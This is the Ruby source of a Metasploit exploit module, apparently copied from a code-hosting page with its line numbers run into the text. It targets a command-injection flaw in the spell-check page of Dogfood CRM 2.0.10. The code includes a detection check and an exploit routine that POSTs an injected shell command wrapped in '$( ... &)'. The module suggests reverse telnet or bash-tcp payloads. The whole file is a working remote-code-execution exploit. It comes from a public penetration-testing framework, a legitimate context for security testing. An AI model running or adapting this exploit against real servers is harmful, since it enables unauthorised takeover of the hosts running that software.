Path: blob/master/modules/exploits/unix/webapp/dogfood_spell_exec.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Dogfood CRM spell.php Remote Command Execution',15'Description' => %q{16This module exploits a previously unpublished vulnerability in the17Dogfood CRM mail function which is vulnerable to command injection18in the spell check feature. Because of character restrictions, this19exploit works best with the double-reverse telnet payload. This20vulnerability was discovered by LSO and affects v2.0.10.21},22'Author' => [23'LSO <lso[at]hushmail.com>', # Exploit module24'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).25],26'License' => BSD_LICENSE,27'References' => [28[ 'OSVDB', '54707' ],29[ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],30],31'Privileged' => false,32'Platform' => ['unix'], # aushack - removed win, linux -> untested33'Arch' => ARCH_CMD,34'Payload' => {35'Space' => 1024,36'DisableNops' => true,37'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install38'Compat' =>39{40'PayloadType' => 'cmd cmd_bash',41'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',42}43},44'Targets' => [ ['Automatic', {}], ],45'DefaultTarget' => 0,46'DisclosureDate' => '2009-03-03',47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),58]59)60end6162def check63res = send_request_raw(64{65'uri' => normalize_uri(datastore['URIPATH']),66}, 167)6869if (res and res.body =~ /Spell Check complete/)70return Exploit::CheckCode::Detected71end7273return Exploit::CheckCode::Safe74end7576def exploit77timeout = 17879cmd = payload.encoded80data = "data=#{Rex::Text.uri_encode('$( ' + cmd + ' &)x')}"81uri = normalize_uri(datastore['URIPATH'])8283response = send_request_cgi(84{85'uri' => uri,86'method' => "POST",87'data' => data88},89timeout90)9192handler93end94end959697